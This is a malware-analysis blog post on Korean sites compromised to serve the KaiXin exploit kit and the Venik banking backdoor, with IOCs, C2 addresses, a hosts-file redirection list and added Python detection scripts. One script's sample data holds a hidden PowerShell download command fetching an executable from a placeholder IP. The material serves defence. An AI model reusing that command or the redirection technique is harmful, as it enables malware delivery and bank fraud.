We looked at our logs for this year and found more Korean websites infected:

  • koreatimes.com (Sep. 18, 2015)
  • filehon.com (May 30, 2015)
  • joara.com (May 3, 2015)
  • hometax.go.kr (May 3, 2015)
  • soriaudio.co.kr (April 23, 2015)
  • gomsee.com (March 16, 2015)
  • lottoplay.co.kr (Feb 6, 2015)
  • insight.co.kr (Jan 31, 2015)
  • filecity.co.kr (Jan 23, 2015)
  • nggol.com (Jan 6, 2015)
  • koreamanse.com (Jan 6, 2015)


The payload we obtained also specifically targets Korean banks by modifying the infected system's hosts file so that traffic meant for Korean banks is redirected to a server the attacker controls. This means the attacker can serve a phishing website without the user knowing they are visiting a phishing site. It also targets AhnLab by killing processes and deleting files specific to that software. AhnLab is a popular antivirus product in South Korea.

[Figure: Infection Flow]



Website Infection

The following analysis focuses on the infection that took place on koreatimes.com.

The culprit is a JavaScript file named “2013_gnb.js”, an iframe injector that leads to the KaiXin EK landing page.



It exploits the following vulnerabilities:

  • CVE-2014-6332 (IE)
  • CVE-2011-3544 (Java)
  • CVE-2015-0336 (flash)


We found interesting strings in the Flash file which give us an idea of the platform the attacker used to build the exploit, along with references to the attacker. Another interesting string, “King Lich V”, was also found in the Flash file and is likely the author's signature. That string has also been found in other attacks involving a Chinese group. The Flash file was also packed using DoSWF.



Once exploitation is successful, it has two options for executing its payload. If it is running on Windows 7 or 8, it launches a PowerShell script that downloads an executable file from 199[.]188[.]106[.]161.



Otherwise, it executes shellcode that downloads the payload from “www[.]jfkdsajfk5263[.]com/server[.]jpg”. The former (the PowerShell path) was essentially used to bypass DEP.
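As an added detection example (not code from the original post), the following script scores constructed process-creation events for the Windows 7/8 path just described: a browser or plugin host spawning powershell.exe with a download cradle that fetches from a raw IP address. The event format, the list of browser-like parent images, the indicator thresholds and the sample command line are assumptions made for this example; the 192.0.2.10 address in the sample is a documentation-range placeholder, not the address from the post.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # image name of the parent process
    image: str     # image name of the created process
    cmdline: str   # command line of the created process


# Images that should not normally be spawning PowerShell (assumption for this example:
# the browser itself plus the Java plugin host, to cover the IE/Java/Flash chain above).
BROWSER_LIKE = {"iexplore.exe", "chrome.exe", "firefox.exe", "java.exe", "javaw.exe"}
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "net.webclient",
                  "invoke-webrequest", "start-bitstransfer")
RAW_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?:[:/]|$)", re.IGNORECASE)

# Constructed process-creation events. The first mirrors the Windows 7/8 path from the
# post; 192.0.2.10 is a documentation-range placeholder, not the address in the post.
SAMPLE_EVENTS = [
    ProcEvent("iexplore.exe", "powershell.exe",
              "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
              "'http://192.0.2.10/66.exe','C:\\Users\\u\\AppData\\Local\\Temp\\66.exe')"),
    # constructed benign entries for contrast
    ProcEvent("explorer.exe", "powershell.exe", "powershell -File C:\\scripts\\inventory.ps1"),
    ProcEvent("chrome.exe", "acrobat.exe", "acrobat.exe C:\\Users\\u\\Downloads\\report.pdf"),
]


def score_event(ev):
    """Return the reasons a PowerShell launch looks like a browser-driven download cradle."""
    reasons = []
    if ev.image.lower() != "powershell.exe":
        return reasons  # only PowerShell launches are in scope for this check
    cl = ev.cmdline.lower()
    if ev.parent.lower() in BROWSER_LIKE:
        reasons.append(f"powershell spawned by {ev.parent}")
    if any(h in cl for h in DOWNLOAD_HINTS):
        reasons.append("command line contains a download cradle")
    if RAW_IP_URL.search(ev.cmdline):
        reasons.append("download URL uses a raw IP address")
    if "-w hidden" in cl or "-windowstyle hidden" in cl:
        reasons.append("hidden window requested")
    return reasons


def alerts(events, min_reasons=2):
    """Events carrying at least min_reasons indicators; a lone cradle from an admin shell is noise."""
    out = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            out.append((ev, reasons))
    return out


if __name__ == "__main__":
    for ev, reasons in alerts(SAMPLE_EVENTS):
        print(f"{ev.parent} -> {ev.image}: {'; '.join(reasons)}")
```

Requiring two independent indicators before alerting keeps an administrator's own `Invoke-WebRequest` from an interactive shell out of the queue, while the browser-parent plus raw-IP combination seen in the exploit chain still scores highly.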

The binary downloaded is a banking malware with backdoor capabilities belonging to the Venik family.


Backdoor Venik

“Venik” is a Russian word for a besom, or broom, used in Russian bathhouses.

The binary downloaded is actually a dropper which, when executed, installs a DLL file in a C:\{random} folder under a random name such as “c:\tqcsv\krxxc.rxk”. It executes this DLL as:

  • “%system32%\rundll32.exe” “c:\tqcsv\krxxc.rxk”,Start


It creates a mutex (M142.0.137.66:3201) and an autostart registry entry such as:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • EvtMgr – “c:\windows\system32\rundll32.exe “c:\tqcsv\krxxc.rxk”,Start”
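To make the persistence mechanism above concrete from the defender's side, here is an added example (not code from the original post) that triages Run-key values for the pattern described: rundll32.exe loading a file with a non-DLL extension from a short, random-looking folder directly under the drive root. The sample entries other than EvtMgr, the trusted-directory list and the folder-name heuristic are constructed assumptions for this example; only the EvtMgr command line is taken from the post.

```python
import ntpath
import re
from typing import NamedTuple


class RunEntry(NamedTuple):
    name: str      # value name under the Run key
    command: str   # value data (the command line launched at logon)


# Constructed sample values. EvtMgr is the entry described in the post; the other two
# are made-up benign entries for contrast.
SAMPLE_RUN_ENTRIES = [
    RunEntry("EvtMgr", r'c:\windows\system32\rundll32.exe "c:\tqcsv\krxxc.rxk",Start'),
    RunEntry("OneDriveSync", r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    RunEntry("ShellHelper", r'"%SystemRoot%\system32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL'),
]

# Directories from which a rundll32 module is unremarkable (assumption for this example).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Captures the module path and entry point from "rundll32.exe <module>,<entry>".
RUNDLL_RE = re.compile(r'rundll32\.exe"?\s+"?([^",]+)"?\s*,\s*(\w+)', re.IGNORECASE)


def analyze_run_entry(entry):
    """Return the reasons this Run value matches the persistence pattern; [] if it does not."""
    reasons = []
    m = RUNDLL_RE.search(entry.command)
    if not m:
        return reasons  # not a rundll32 launch; out of scope for this check
    module, entry_point = m.group(1).strip(), m.group(2)
    module_l = (module.lower()
                .replace("%systemroot%", "c:\\windows")
                .replace("%windir%", "c:\\windows"))
    if not module_l.startswith(TRUSTED_PREFIXES):
        reasons.append(f"rundll32 module outside trusted directories: {module}")
    ext = ntpath.splitext(module_l)[1]
    if ext != ".dll":
        reasons.append(f"rundll32 module has a non-DLL extension ({ext or 'none'}), "
                       f"entry point {entry_point}: {module}")
    parts = module_l.split("\\")
    # <drive>:\<short lowercase folder>\<file> is the C:\{random} layout from the post
    if len(parts) == 3 and re.fullmatch(r"[a-z]{4,6}", parts[1]):
        reasons.append(f"module stored in a short random-looking root folder: \\{parts[1]}")
    return reasons


def triage(entries):
    """Map value name -> reasons for every entry with at least one finding."""
    findings = {}
    for entry in entries:
        reasons = analyze_run_entry(entry)
        if reasons:
            findings[entry.name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_RUN_ENTRIES).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

On a live host the entries would come from HKCU and HKLM `...\CurrentVersion\Run` rather than the constructed list; the three heuristics are deliberately independent so that a legitimate control-panel applet launched through rundll32 from System32 scores nothing.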

After installation, it beacons out to its server by contacting the following URLs:

  • http://142[.]0[.]137[.]68:803
  • http://142[.]0[.]137[.]67:805/index.php

It also opens a connection over TCP port 3201 and waits for a command from the server. The server can issue a command that starts a remote access service on the infected client.



It also collects files from the %ProgramFiles% folder and mapped drives. It copies the files to a randomly named file in C:\ using xcopy and uploads that file to its server over an HTTP session.


It modifies the hosts file (%system32%\drivers\etc\hosts), adding entries for the hostnames listed below. This effectively redirects the user's visits to banking sites to a site controlled by the attacker, which is actually a phishing site:

    www.shinhan.com.or
    search.daum.net
    search.naver.com
    www.kbstar.com.or
    www.knbank.vo.kr
    openbank.cu.vo.kr
    www.busanbank.vo.kr
    www.nonghyup.com.or
    www.shinhan.ccm
    www.wooribank.com.or
    www.hanabank.ccm
    www.epostbank.go.kr.or
    www.ibk.co.kr.or
    www.ibk.vo.kr
    www.keb.co.kr.or
    www.kfcc.co.kr.or
    www.lottirich.co.ir
    www.nlotto.co.ir
    www.gmarket.net
    nate.com
    www.nate.com
    daum.com
    www.daum.net
    daum.net
    www.zum.com
    zum.com
    naver.com
    www.nonghyup.com
    www.naver.com
    www.nate.net
    hanmail.net
    www.hanmail.net
    www.hanacbs.com
    www.kfcc.co.kr
    www.kfcc.vo.kr
    www.daum.net
    daum.net
    www.kbstir.com
    www.nonghuyp.com
    www.shinhon.com
    www.wooribank.com
    www.ibk.co.kr
    www.epostbenk.go.kr
    www.keb.co.kr
    www.citibank.co.kr.or
    www.citibank.vo.kr
    www.standardchartered.co.kr.or
    www.standardchartered.vo.kr
    www.suhyup-bank.com.or
    www.suhyup-bank.com
    www.kjbank.com.or
    www.kjbank.com
    openbank.cu.co.kr.or
    openbank.cu.co.kr
    www.knbank.co.kr.or
    www.knbank.co.kr
    www.busanbank.co.kr.or
    www.busanbank.co.ir
    www.suhyup-bank.com
    www.suhyup-bank.ccm
    www.standardchartered.co.kr

[Figure: Host File Modification]
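The hosts-file tampering above is straightforward to audit. The following is an added example, not code from the original post, that parses hosts-file text and flags every non-loopback mapping, separating protected hostnames (a handful of legitimate bank and portal names corresponding to entries in the list above), lookalikes within a small edit distance of a protected name (such as www.shinhan.ccm or www.nonghuyp.com), and everything else. The sample hosts content, the protected set and the 203.0.113.x / 198.51.100.x addresses are constructed for this example; the post does not state which address the entries pointed to.

```python
import ipaddress

# Constructed hosts-file content modelled on the tampering described in the post.
# 203.0.113.10 and 198.51.100.7 are documentation-range placeholders, not addresses from the post.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.10    www.kbstar.com.or
203.0.113.10    www.shinhan.ccm
203.0.113.10    www.naver.com
203.0.113.10    www.nonghuyp.com
198.51.100.7    updates.example.test
"""

# Legitimate hostnames to protect (assumed baseline for this example; in practice this
# comes from your own inventory of banking and portal sites).
PROTECTED = {
    "www.kbstar.com", "www.shinhan.com", "www.naver.com", "www.nonghyup.com",
    "www.wooribank.com", "www.ibk.co.kr", "www.daum.net",
}


def parse_hosts(text):
    """Return (ip, hostname) pairs from hosts-file text, skipping comments and blank lines."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:          # one address may carry several names
            pairs.append((fields[0], name.lower()))
    return pairs


def levenshtein(a, b):
    """Plain edit distance; hostnames are short, so the O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def closest_protected(name):
    best = min(PROTECTED, key=lambda p: levenshtein(name, p))
    return best, levenshtein(name, best)


def audit_hosts(text, max_lookalike_distance=3):
    """Return (hostname, ip, reason) triples for every entry that deserves a look."""
    findings = []
    for ip, name in parse_hosts(text):
        try:
            if ipaddress.ip_address(ip).is_loopback:
                continue  # 127.0.0.1 / ::1 entries are the normal content of the file
        except ValueError:
            findings.append((name, ip, "malformed address field"))
            continue
        if name in PROTECTED:
            findings.append((name, ip, "protected hostname pinned to a non-loopback address"))
            continue
        match, dist = closest_protected(name)
        if dist <= max_lookalike_distance:
            findings.append((name, ip, f"lookalike of protected hostname {match} (edit distance {dist})"))
        else:
            findings.append((name, ip, "unrecognised hostname pinned to a non-loopback address"))
    return findings


if __name__ == "__main__":
    for host, ip, why in audit_hosts(SAMPLE_HOSTS):
        print(f"{ip:<16} {host:<28} {why}")
```

On a Windows host the text would be read from %SystemRoot%\System32\drivers\etc\hosts; the lookalike check matters because the file also pins misspelled names such as www.kbstir.com, which a simple "is this a known bank domain" comparison would miss.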

The phishing site asks for sensitive information that is not usually requested during a normal online banking session.



At times it also asks the user to visit other banking sites, which likewise lead to phishing pages. This likely happens when the phishing site does not currently support the user's bank.



In addition to its attack on Korea-related services, it tries to disable AhnLab-related files and processes. AhnLab is a popular antivirus product in South Korea.



As of September 25, we verified that koreatimes.com is clean of this infection.

Related Samples

  Sample          Hash                              Packer   Filename
  Venik Dropper   c242d641d9432f611360db36f2075f67  UPX      66.exe
  Venik DLL       a6ec0fbe1ad821a3fb527f39e180e378  RLPack   {random}
  Flash Exploit   b9a5a00e134fe0df217c01145319b1cb  DoSWF    ad.swf



Credits to Alex Burt for his help in the discovery of this infection.